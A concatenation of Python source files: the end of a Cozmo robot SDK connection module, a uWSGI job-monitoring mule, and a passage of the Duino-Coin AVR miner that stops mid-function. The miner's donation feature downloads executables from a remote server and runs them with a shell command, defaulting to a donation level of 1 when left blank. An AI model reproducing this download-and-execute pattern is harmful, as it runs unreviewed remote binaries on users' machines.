subclass that handles opening the USB connection to a device.
By default, it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
abort_future (:class:`concurrent.futures.Future): Optional future to
raise an exception on in the event of an exception occurring within
the thread.
'''
def __init__(self, loop, f=None, conn_factory=conn.CozmoConnection, connector=None, abort_future=None):
self.loop = loop
self.f = f
if not abort_future:
abort_future = concurrent.futures.Future()
self.abort_future = abort_future
self.conn_factory = conn_factory
self.connector = connector
self.thread = None
self._running = False
def start(self):
'''Start a thread and open a connection to a device.
Returns:
:class:`cozmo.conn.CozmoConnection` instance
'''
q = queue.Queue()
abort_future = concurrent.futures.Future()
def run_loop():
asyncio.set_event_loop(self.loop)
try:
coz_conn = connect_on_loop(self.loop, self.conn_factory, self.connector)
q.put(coz_conn)
except Exception as e:
self.abort_future.set_exception(e)
q.put(e)
return
if self.f:
asyncio.ensure_future(self.f(coz_conn))
self.loop.run_forever()
self.thread = threading.Thread(target=run_loop)
self.thread.start()
coz_conn = q.get(10)
if coz_conn is None:
raise TimeoutError("Timed out waiting for connection to device")
if isinstance(coz_conn, Exception):
raise coz_conn
self.coz_conn = coz_conn
self._running = True
return coz_conn
def stop(self):
'''Cleaning shutdown the running loop and thread.'''
if self._running:
async def _stop():
await self.coz_conn.shutdown()
self.loop.call_soon(lambda: self.loop.stop())
asyncio.run_coroutine_threadsafe(_stop(), self.loop).result()
self.thread.join()
self._running = False
def abort(self, exc):
'''Abort the running loop and thread.'''
if self._running:
async def _abort(exc):
self.coz_conn.abort(exc)
asyncio.run_coroutine_threadsafe(_abort(exc), self.loop).result()
self.stop()
def _connect_async(f, conn_factory=conn.CozmoConnection, connector=None):
# use the default loop, if one is available for the current thread,
# if not create a new loop and make it the default.
#
# the expectation is that if the user wants explicit control over which
# loop the code is executed on, they'll just use connect_on_loop directly.
loop = None
try:
loop = asyncio.get_event_loop()
except:
pass
if loop is None:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
coz_conn = connect_on_loop(loop, conn_factory, connector)
try:
loop.run_until_complete(f(coz_conn))
except KeyboardInterrupt:
logger.info('Exit requested by user')
finally:
loop.run_until_complete(coz_conn.shutdown())
loop.stop()
loop.run_forever()
_sync_loop = asyncio.new_event_loop()
def _connect_sync(f, conn_factory=conn.CozmoConnection, connector=None):
abort_future = concurrent.futures.Future()
conn_factory = functools.partial(conn_factory, _sync_abort_future=abort_future)
lt = _LoopThread(_sync_loop, conn_factory=conn_factory, connector=connector, abort_future=abort_future)
_sync_loop.set_exception_handler(functools.partial(_sync_exception_handler, abort_future))
coz_conn = lt.start()
try:
f(base._SyncProxy(coz_conn))
finally:
lt.stop()
def connect_on_loop(loop, conn_factory=conn.CozmoConnection, connector=None):
'''Uses the supplied event loop to connect to a device.
Will run the event loop in the current thread until the
connection succeeds or fails.
If you do not want/need to manage your own loop, then use the
:func:`connect` function to handle setup/teardown and execute
a user-supplied function.
Args:
loop (:class:`asyncio.BaseEventLoop`): The event loop to use to
connect to Cozmo.
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default, it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
Returns:
A :class:`cozmo.conn.CozmoConnection` instance.
'''
if connector is None:
connector = _DEFAULT_CONNECTOR
factory = functools.partial(conn_factory, loop=loop)
async def conn_check(coz_conn):
await coz_conn.wait_for(conn.EvtConnected, timeout=5)
async def connect():
return await connector.connect(loop, factory, conn_check)
transport, coz_conn = loop.run_until_complete(connect())
return coz_conn
def connect(f, conn_factory=conn.CozmoConnection, connector=None):
'''Connects to the Cozmo Engine on the mobile device and supplies the connection to a function.
Accepts a function, f, that is given a :class:`cozmo.conn.CozmoConnection` object as
a parameter.
The supplied function may be either an asynchronous coroutine function
(normally defined using ``async def``) or a regular synchronous function.
If an asynchronous function is supplied it will be run on the same thread
as the Cozmo event loop and must use the ``await`` keyword to yield control
back to the loop.
If a synchronous function is supplied then it will run on the main thread
and Cozmo's event loop will run on a separate thread. Calls to
asynchronous methods returned from CozmoConnection will automatically
be translated to synchronous ones.
The connect function will return once the supplied function has completed,
as which time it will terminate the connection to the robot.
Args:
f (callable): The function to execute
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
'''
if asyncio.iscoroutinefunction(f):
return _connect_async(f, conn_factory, connector)
return _connect_sync(f, conn_factory, connector)
def _connect_viewer(f, conn_factory, connector, viewer):
# Run the viewer in the main thread, with the SDK running on a new background thread.
loop = asyncio.new_event_loop()
abort_future = concurrent.futures.Future()
async def view_connector(coz_conn):
try:
await viewer.connect(coz_conn)
if inspect.iscoroutinefunction(f):
await f(coz_conn)
else:
await coz_conn._loop.run_in_executor(None, f, base._SyncProxy(coz_conn))
finally:
viewer.disconnect()
try:
if not inspect.iscoroutinefunction(f):
conn_factory = functools.partial(conn_factory, _sync_abort_future=abort_future)
lt = _LoopThread(loop, f=view_connector, conn_factory=conn_factory, connector=connector)
lt.start()
viewer.mainloop()
except BaseException as e:
abort_future.set_exception(exceptions.SDKShutdown(repr(e)))
raise
finally:
lt.stop()
def connect_with_3dviewer(f, conn_factory=conn.CozmoConnection, connector=None,
enable_camera_view=False, show_viewer_controls=True):
'''Setup a connection to a device and run a user function while displaying Cozmo's 3d world.
This displays an OpenGL window on the screen with a 3D view of Cozmo's
understanding of the world. Optionally, if `use_viewer` is True, a 2nd OpenGL
window will also display showing a view of Cozmo's camera. It will return an
error if the current system does not support PyOpenGL.
The function may be either synchronous or asynchronous (defined
used ``async def``).
The function must accept a :class:`cozmo.CozmoConnection` object as
its only argument.
This call will block until the supplied function completes.
Args:
f (callable): The function to execute
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
enable_camera_view (bool): Specifies whether to also open a 2D camera
view in a second OpenGL window.
show_viewer_controls (bool): Specifies whether to draw controls on the view.
'''
try:
from . import opengl
except ImportError as exc:
opengl = exc
if isinstance(opengl, Exception):
if isinstance(opengl, exceptions.InvalidOpenGLGlutImplementation):
raise NotImplementedError('GLUT (OpenGL Utility Toolkit) is not available:\n%s'
% opengl)
else:
raise NotImplementedError('opengl is not available; '
'make sure the PyOpenGL, PyOpenGL-accelerate and Pillow packages are installed:\n'
'Do `pip3 install --user cozmo[3dviewer]` to install. Error: %s' % opengl)
viewer = opengl.OpenGLViewer(enable_camera_view=enable_camera_view, show_viewer_controls=show_viewer_controls)
_connect_viewer(f, conn_factory, connector, viewer)
def connect_with_tkviewer(f, conn_factory=conn.CozmoConnection, connector=None, force_on_top=False):
'''Setup a connection to a device and run a user function while displaying Cozmo's camera.
This displays a Tk window on the screen showing a view of Cozmo's camera.
It will return an error if the current system does not support Tk.
The function may be either synchronous or asynchronous (defined
used ``async def``).
The function must accept a :class:`cozmo.CozmoConnection` object as
its only argument.
This call will block until the supplied function completes.
Args:
f (callable): The function to execute
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
force_on_top (bool): Specifies whether the window should be forced on top of all others
'''
try:
from . import tkview
except ImportError as exc:
tkview = exc
if isinstance(tkview, Exception):
raise NotImplementedError('tkviewer not available on this platform; '
'make sure Tkinter, NumPy and Pillow packages are installed (%s)' % tkview)
viewer = tkview.TkImageViewer(force_on_top=force_on_top)
_connect_viewer(f, conn_factory, connector, viewer)
def setup_basic_logging(general_log_level=None, protocol_log_level=None,
protocol_log_messages=clad_protocol.LOG_ALL, target=sys.stderr,
deprecated_filter="default"):
'''Helper to perform basic setup of the Python logging machinery.
The SDK defines two loggers:
* :data:`logger` ("cozmo.general") - For general purpose information
about events within the SDK; and
* :data:`logger_protocol` ("cozmo.protocol") - For low level
communication messages between the device and the SDK.
Generally only :data:`logger` is interesting.
Args:
general_log_level (str): 'DEBUG', 'INFO', 'WARN', 'ERROR' or an equivalent
constant from the :mod:`logging` module. If None then a
value will be read from the COZMO_LOG_LEVEL environment variable.
protocol_log_level (str): as general_log_level. If None then a
value will be read from the COZMO_PROTOCOL_LOG_LEVEL environment
variable.
protocol_log_messages (list): The low level messages that should be
logged to the protocol log. Defaults to all. Will read from
the COMZO_PROTOCOL_LOG_MESSAGES if available which should be
a comma separated list of message names (case sensitive).
target (object): The stream to send the log data to; defaults to stderr
deprecated_filter (str): The filter for any DeprecationWarning messages.
This is defaulted to "default" which shows the warning once per
location. You can hide all deprecated warnings by passing in "ignore",
see https://docs.python.org/3/library/warnings.html#warning-filter
for more information.
'''
if deprecated_filter is not None:
warnings.filterwarnings(deprecated_filter, category=DeprecationWarning)
if general_log_level is None:
general_log_level = os.environ.get('COZMO_LOG_LEVEL', logging.INFO)
if protocol_log_level is None:
protocol_log_level = os.environ.get('COZMO_PROTOCOL_LOG_LEVEL', logging.INFO)
if protocol_log_level:
if 'COMZO_PROTOCOL_LOG_MESSAGES' in os.environ:
lm = os.environ['COMZO_PROTOCOL_LOG_MESSAGES']
if lm.lower() == 'all':
clad_protocol.CLADProtocol._clad_log_which = clad_protocol.LOG_ALL
else:
clad_protocol.CLADProtocol._clad_log_which = set(lm.split(','))
else:
clad_protocol.CLADProtocol._clad_log_which = protocol_log_messages
h = logging.StreamHandler(stream=target)
f = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
h.setFormatter(f)
logger.addHandler(h)
logger. setLevel(general_log_level)
if protocol_log_level is not None:
logger_protocol.addHandler(h)
logger_protocol.setLevel(protocol_log_level)
def run_program(f, use_viewer=False, conn_factory=conn.CozmoConnection,
connector=None, force_viewer_on_top=False,
deprecated_filter="default", use_3d_viewer=False,
show_viewer_controls=True,
exit_on_connection_error=True):
'''Connect to Cozmo and run the provided program/function f.
Args:
f (callable): The function to execute, accepts a connected
:class:`cozmo.robot.Robot` as the parameter.
use_viewer (bool): Specifies whether to display a view of Cozmo's camera
in a window.
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
force_viewer_on_top (bool): Specifies whether the window should be
forced on top of all others (only relevant if use_viewer is True).
Note that this is ignored if use_3d_viewer is True (as it's not
currently supported on that windowing system).
deprecated_filter (str): The filter for any DeprecationWarning messages.
This is defaulted to "default" which shows the warning once per
location. You can hide all deprecated warnings by passing in "ignore",
see https://docs.python.org/3/library/warnings.html#warning-filter
for more information.
use_3d_viewer (bool): Specifies whether to display a 3D view of Cozmo's
understanding of the world in a window. Note that if both this and
`use_viewer` are set then the 2D camera view will render in an OpenGL
window instead of a TkView window.
show_viewer_controls (bool): Specifies whether to draw controls on the view.
exit_on_connection_error (bool): Specify whether the program should exit on
connection error or should an error be raised. Default to true.
'''
setup_basic_logging(deprecated_filter=deprecated_filter)
# Wrap f (a function that takes in an already created robot)
# with a function that accepts a cozmo.conn.CozmoConnection
if asyncio.iscoroutinefunction(f):
@functools.wraps(f)
async def wrapper(sdk_conn):
try:
robot = await sdk_conn.wait_for_robot()
await f(robot)
except exceptions.SDKShutdown:
pass
except KeyboardInterrupt:
logger.info('Exit requested by user')
else:
@functools.wraps(f)
def wrapper(sdk_conn):
try:
robot = sdk_conn.wait_for_robot()
f(robot)
except exceptions.SDKShutdown:
pass
except KeyboardInterrupt:
logger.info('Exit requested by user')
try:
if use_3d_viewer:
connect_with_3dviewer(wrapper, conn_factory=conn_factory, connector=connector,
enable_camera_view=use_viewer, show_viewer_controls=show_viewer_controls)
elif use_viewer:
connect_with_tkviewer(wrapper, conn_factory=conn_factory, connector=connector,
force_on_top=force_viewer_on_top)
else:
connect(wrapper, conn_factory=conn_factory, connector=connector)
except KeyboardInterrupt:
logger.info('Exit requested by user')
except exceptions.ConnectionError as e:
if exit_on_connection_error:
sys.exit("A connection error occurred: %s" % e)
else:
logger.error("A connection error occurred: %s" % e)
raise
|
jgi_gatewayMule.py
|
import threading
from os import environ
import uwsgi
from configparser import ConfigParser
if __name__ == '__main__' and __package__ is None:
from os import sys, path
my_dir = path.dirname(path.dirname(path.abspath(__file__)))
print('my dir')
print(my_dir)
sys.path.append(my_dir)
from jgi_gateway.staging_jobs_manager import StagingJobsManager
from jgi_gateway import utils
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'jgi_gateway'):
retconfig[nameval[0]] = nameval[1]
return retconfig
app_config = utils.validate_config(get_config())
class Looper:
def __init__(self, config):
self.in_loop = False
self.interval = 10
self.job_checks = 0
self.jobs_manager = StagingJobsManager(config)
def start_job_check_loop(self):
if self.in_loop:
return
self.in_loop = True
self.job_check_loop()
def job_check_loop(self):
jobs, error = self.jobs_manager.sync_active_jobs()
if jobs:
threading.Timer(self.interval, self.job_check_loop).start()
else:
self.in_loop = False
def mule_loop():
looper = Looper(app_config)
while True:
message = uwsgi.mule_get_msg()
if message == b'start-job-monitoring':
looper.start_job_check_loop()
else:
print('unknown message:')
print(message)
# this_thread = threading.Thread(target=mule_loop)
# this_thread.daemon = True
# this_thread.start()
if __name__ == '__main__':
# threading.Thread(target=mule_loop, deamon=True).start()
mule_loop()
|
AVR_Miner.py
|
#!/usr/bin/env python3
"""
Duino-Coin Official AVR Miner 2.73 ยฉ MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duino-coin
Duino-Coin Team & Community 2019-2021
"""
from os import _exit, execl, mkdir
from os import name as osname
from os import path
from os import system as ossystem
from platform import machine as osprocessor
from platform import system
import sys
from configparser import ConfigParser
from pathlib import Path
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from re import sub
from socket import socket
from datetime import datetime
from statistics import mean
from signal import SIGINT, signal
from time import ctime, sleep, strptime, time
from random import choice
import select
import pip
from subprocess import DEVNULL, Popen, check_call, call
from threading import Thread as thrThread
from threading import Lock as thread_lock
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
call([sys.executable, __file__])
try:
from serial import Serial
import serial.tools.list_ports
except ModuleNotFoundError:
print("Pyserial is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pyserial")
install('pyserial')
try:
import requests
except ModuleNotFoundError:
print("Requests is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install requests")
install('requests')
try:
from colorama import Back, Fore, Style, init
init(autoreset=True)
except ModuleNotFoundError:
print("Colorama is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install colorama")
install("colorama")
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pypresence")
install("pypresence")
def now():
return datetime.now()
def port_num(com):
return str(''.join(filter(str.isdigit, com)))
class Settings:
VER = '2.73'
SOC_TIMEOUT = 45
REPORT_TIME = 60
AVR_TIMEOUT = 4 # diff 6 * 100 / 196 h/s = 3.06
BAUDRATE = 115200
DATA_DIR = "Duino-Coin AVR Miner " + str(VER)
SEPARATOR = ","
ENCODING = "utf-8"
BLOCK = " โ "
PICK = ""
COG = " @"
if osname != "nt":
# Windows' cmd does not support emojis, shame!
PICK = " โ"
COG = " โ"
class Client:
"""
Class helping to organize socket connections
"""
def connect(pool: tuple):
s = socket()
s.settimeout(Settings.SOC_TIMEOUT)
s.connect((pool))
return s
def send(s, msg: str):
sent = s.sendall(str(msg).encode(Settings.ENCODING))
return True
def recv(s, limit: int = 128):
data = s.recv(limit).decode(Settings.ENCODING).rstrip("\n")
return data
def fetch_pool():
while True:
pretty_print("net0", " " + get_string("connection_search"),
"warning")
try:
response = requests.get(
"https://server.duinocoin.com/getPool").json()
if response["success"] == True:
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
debug_output(f"Fetched pool: {response['name']}")
return (NODE_ADDRESS, NODE_PORT)
elif "message" in response:
pretty_print(f"Warning: {response['message']}"
+ ", retrying in 15s", "warning", "net0")
sleep(15)
else:
raise Exception(
"no response - IP ban or connection error")
except Exception as e:
pretty_print("net0",
f"Error fetching mining node: {e}"
+ ", retrying in 15s", "error")
sleep(15)
class Donate:
def load(donation_level):
if donation_level > 0:
if osname == 'nt':
if not Path(
f"{Settings.DATA_DIR}/Donate.exe").is_file():
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableWindows.exe')
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate.exe",
'wb') as f:
f.write(r.content)
elif osname == "posix":
if osprocessor() == "aarch64":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH64')
elif osprocessor() == "armv7l":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH32')
else:
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableLinux')
if not Path(
f"{Settings.DATA_DIR}/Donate").is_file():
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate",
"wb") as f:
f.write(r.content)
def start(donation_level):
if osname == 'nt':
cmd = (f'cd "{Settings.DATA_DIR}" & Donate.exe '
+ '-o stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*5}')
elif osname == 'posix':
cmd = (f'cd "{Settings.DATA_DIR}" && chmod +x Donate '
+ '&& nice -20 ./Donate -o '
+ 'stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*5}')
if donation_level <= 0:
pretty_print(
'sys0', Fore.YELLOW
+ get_string('free_network_warning').lstrip()
+ get_string('donate_warning').replace("\n", "\n\t\t")
+ Fore.GREEN + 'https://duinocoin.com/donate'
+ Fore.YELLOW + get_string('learn_more_donate'),
'warning')
sleep(5)
if donation_level > 0:
debug_output(get_string('starting_donation'))
donateExecutable = Popen(cmd, shell=True, stderr=DEVNULL)
pretty_print('sys0',
get_string('thanks_donation').replace("\n", "\n\t\t"),
'warning')
shares = [0, 0]
hashrate_mean = []
ping_mean = []
diff = 0
shuffle_ports = "y"
donator_running = False
job = ''
debug = 'n'
discord_presence = 'y'
rig_identifier = 'None'
donation_level = 0
hashrate = 0
config = ConfigParser()
mining_start_time = time()
if not path.exists(Settings.DATA_DIR):
mkdir(Settings.DATA_DIR)
if not Path(Settings.DATA_DIR + '/Translations.json').is_file():
url = ('https://raw.githubusercontent.com/'
+ 'revoxhere/'
+ 'duino-coin/master/Resources/'
+ 'AVR_Miner_langs.json')
r = requests.get(url)
with open(Settings.DATA_DIR + '/Translations.json', 'wb') as f:
f.write(r.content)
# Load language file
with open(Settings.DATA_DIR + '/Translations.json', 'r',
encoding='utf8') as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if system() == 'Darwin':
if getlocale()[0] is None:
setlocale(LC_ALL, 'en_US.UTF-8')
try:
if not Path(Settings.DATA_DIR + '/Settings.cfg').is_file():
locale = getdefaultlocale()[0]
if locale.startswith('es'):
lang = 'spanish'
elif locale.startswith('sk'):
lang = 'slovak'
elif locale.startswith('ru'):
lang = 'russian'
elif locale.startswith('pl'):
lang = 'polish'
elif locale.startswith('fr'):
lang = 'french'
elif locale.startswith('tr'):
lang = 'turkish'
elif locale.startswith('pt'):
lang = 'portuguese'
elif locale.startswith('zh'):
lang = 'chinese_simplified'
elif locale.startswith('th'):
lang = 'thai'
else:
lang = 'english'
else:
try:
config.read(Settings.DATA_DIR + '/Settings.cfg')
lang = config["AVR Miner"]['language']
except Exception:
lang = 'english'
except:
lang = 'english'
def get_string(string_name: str):
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file['english']:
return lang_file['english'][string_name]
else:
return ' String not found: ' + string_name
def get_prefix(symbol: str,
val: float,
accuracy: int):
"""
H/s, 1000 => 1 kH/s
"""
if val >= 1_000_000_000_000: # Really?
val = str(round((val / 1_000_000_000_000), accuracy)) + " T"
elif val >= 1_000_000_000:
val = str(round((val / 1_000_000_000), accuracy)) + " G"
elif val >= 1_000_000:
val = str(round((val / 1_000_000), accuracy)) + " M"
elif val >= 1_000:
val = str(round((val / 1_000))) + " k"
else:
if symbol:
val = str(round(val)) + " "
else:
val = str(round(val))
return val + symbol
def debug_output(text: str):
if debug == 'y':
print(Style.RESET_ALL + Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S.%f ')
+ Style.NORMAL + f'DEBUG: {text}')
def title(title: str):
if osname == 'nt':
"""
Changing the title in Windows' cmd
is easy - just use the built-in
title command
"""
ossystem('title ' + title)
else:
"""
Most *nix terminals use
this escape sequence to change
the console window title
"""
print('\33]0;' + title + '\a', end='')
sys.stdout.flush()
def handler(signal_received, frame):
pretty_print(
'sys0', get_string('sigint_detected')
+ Style.NORMAL + Fore.RESET
+ get_string('goodbye'), 'warning')
_exit(0)
# Enable signal handler
signal(SIGINT, handler)
def load_config():
global username
global donation_level
global avrport
global debug
global rig_identifier
global discord_presence
global shuffle_ports
global SOC_TIMEOUT
if not Path(str(Settings.DATA_DIR) + '/Settings.cfg').is_file():
print(
Style.BRIGHT + get_string('basic_config_tool')
+ Settings.DATA_DIR
+ get_string('edit_config_file_warning'))
print(
Style.RESET_ALL + get_string('dont_have_account')
+ Fore.YELLOW + get_string('wallet') + Fore.RESET
+ get_string('register_warning'))
username = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_username')
+ Fore.RESET + Style.BRIGHT)
print(Style.RESET_ALL + Fore.YELLOW
+ get_string('ports_message'))
portlist = serial.tools.list_ports.comports(include_links=True)
for port in portlist:
print(Style.RESET_ALL
+ Style.BRIGHT + Fore.RESET
+ ' ' + str(port))
print(Style.RESET_ALL + Fore.YELLOW
+ get_string('ports_notice'))
port_names = []
for port in portlist:
port_names.append(port.device)
avrport = ''
while True:
current_port = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_avrport')
+ Fore.RESET + Style.BRIGHT)
if current_port in port_names:
avrport += current_port
confirmation = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_anotherport')
+ Fore.RESET + Style.BRIGHT)
if confirmation == 'y' or confirmation == 'Y':
avrport += ','
else:
break
else:
print(Style.RESET_ALL + Fore.RED
+ 'Please enter a valid COM port from the list above')
rig_identifier = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_rig_identifier')
+ Fore.RESET + Style.BRIGHT)
if rig_identifier == 'y' or rig_identifier == 'Y':
rig_identifier = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_rig_name')
+ Fore.RESET + Style.BRIGHT)
else:
rig_identifier = 'None'
donation_level = '0'
if osname == 'nt' or osname == 'posix':
donation_level = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_donation_level')
+ Fore.RESET + Style.BRIGHT)
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
donation_level = int(donation_level)
config["AVR Miner"] = {
'username': username,
'avrport': avrport,
'donate': donation_level,
'language': lang,
'identifier': rig_identifier,
'debug': 'n',
"soc_timeout": 45,
"avr_timeout": 4,
"discord_presence": "y",
"periodic_report": 60,
"shuffle_ports": "y"}
with open(str(Settings.DATA_DIR)
+ '/Settings.cfg', 'w') as configfile:
config.write(configfile)
avrport = avrport.split(',')
print(Style.RESET_ALL + get_string('config_saved'))
else:
config.read(str(Settings.DATA_DIR) + '/Settings.cfg')
username = config["AVR Miner"]['username']
avrport = config["AVR Miner"]['avrport']
avrport = avrport.replace(" ", "").split(',')
donation_level = int(config["AVR Miner"]['donate'])
debug = config["AVR Miner"]['debug']
rig_identifier = config["AVR Miner"]['identifier']
Settings.SOC_TIMEOUT = int(config["AVR Miner"]["soc_timeout"])
Settings.AVR_TIMEOUT = float(config["AVR Miner"]["avr_timeout"])
discord_presence = config["AVR Miner"]["discord_presence"]
shuffle_ports = config["AVR Miner"]["shuffle_ports"]
Settings.REPORT_TIME = int(config["AVR Miner"]["periodic_report"])
def greeting():
global greeting
print(Style.RESET_ALL)
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = get_string('greeting_morning')
elif current_hour == 12:
greeting = get_string('greeting_noon')
elif current_hour > 12 and current_hour < 18:
greeting = get_string('greeting_afternoon')
elif current_hour >= 18:
greeting = get_string('greeting_evening')
else:
greeting = get_string('greeting_back')
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Fore.YELLOW
+ Style.BRIGHT + get_string('banner')
+ Style.RESET_ALL + Fore.MAGENTA
+ f' {Settings.VER}' + Fore.RESET
+ ' 2019-2021')
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL + Fore.MAGENTA
+ 'https://github.com/revoxhere/duino-coin')
if lang != "english":
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + lang.capitalize()
+ " translation: " + Fore.MAGENTA
+ get_string("translation_autor"))
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('avr_on_port')
+ Style.BRIGHT + Fore.YELLOW
+ ' '.join(avrport))
if osname == 'nt' or osname == 'posix':
print(
Style.DIM + Fore.MAGENTA + Settings.BLOCK
+ Style.NORMAL + Fore.RESET
+ get_string('donation_level') + Style.BRIGHT
+ Fore.YELLOW + str(donation_level))
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('algorithm')
+ Style.BRIGHT + Fore.YELLOW
+ 'DUCO-S1A โ AVR diff')
if rig_identifier != "None":
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('rig_identifier')
+ Style.BRIGHT + Fore.YELLOW + rig_identifier)
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + str(greeting) + ', '
+ Style.BRIGHT + Fore.YELLOW
+ str(username) + '!\n')
def init_rich_presence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
Thread(target=Discord_rp.update).start()
except Exception as e:
#print("Error launching Discord RPC thread: " + str(e))
pass
def update_rich_presence():
startTime = int(time())
while True:
try:
total_hashrate = get_prefix("H/s", sum(hashrate.values()), 2)
RPC.update(details="Hashrate: " + str(total_hashrate),
start=mining_start_time,
state=str(accept.value) + "/"
+ str(reject.value + accept.value)
+ " accepted shares",
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything"
+ ", including AVR boards",
buttons=[{"label": "Visit duinocoin.com",
"url": "https://duinocoin.com"},
{"label": "Join the Discord",
"url": "https://discord.gg/k48Ht5y"}])
except Exception as e:
#print("Error updating Discord RPC thread: " + str(e))
pass
sleep(15)
def pretty_print(sender: str = "sys0",
msg: str = None,
state: str = "success"):
"""
Produces nicely formatted CLI output for messages:
HH:MM:S |sender| msg
"""
if sender.startswith("net"):
bg_color = Back.BLUE
elif sender.startswith("avr"):
bg_color = Back.MAGENTA
elif sender.startswith("sys"):
bg_color = Back.GREEN
if state == "success":
fg_color = Fore.GREEN
elif state == "error":
fg_color = Fore.RED
else:
fg_color = Fore.YELLOW
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ bg_color + Style.BRIGHT + " " + sender + " "
+ Back.RESET + " " + fg_color + msg.strip())
def share_print(id, type, accept, reject, total_hashrate,
computetime, diff, ping):
"""
Produces nicely formatted CLI output for shares:
HH:MM:S |avrN| โ Accepted 0/0 (100%) โ 0.0s โ 0 kH/s โ diff 0 k โ ping 0ms
"""
try:
diff = get_prefix("", int(diff), 0)
except:
diff = "?"
try:
total_hashrate = get_prefix("H/s", total_hashrate, 2)
except:
total_hashrate = "? H/s"
if type == "accept":
share_str = get_string("accepted")
fg_color = Fore.GREEN
elif type == "block":
share_str = get_string("block_found")
fg_color = Fore.YELLOW
else:
share_str = get_string("rejected")
fg_color = Fore.RED
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Fore.WHITE + Style.BRIGHT + Back.MAGENTA + Fore.RESET
+ " avr" + str(id) + " " + Back.RESET
+ fg_color + Settings.PICK + share_str + Fore.RESET
+ str(accept) + "/" + str(accept + reject) + Fore.YELLOW
+ " (" + str(round(accept / (accept + reject) * 100)) + "%)"
+ Style.NORMAL + Fore.RESET
+ " โ " + str("%04.1f" % float(computetime)) + "s"
+ Style.NORMAL + " โ " + Fore.BLUE + Style.BRIGHT
+ str(total_hashrate) + Fore.RESET + Style.NORMAL
+ Settings.COG + f" diff {diff} โ " + Fore.CYAN
+ f"ping {(int(ping))}ms")
def mine_avr(com, threadid, fastest_pool):
global hashrate
start_time = time()
report_shares = 0
while True:
while True:
try:
ser.close()
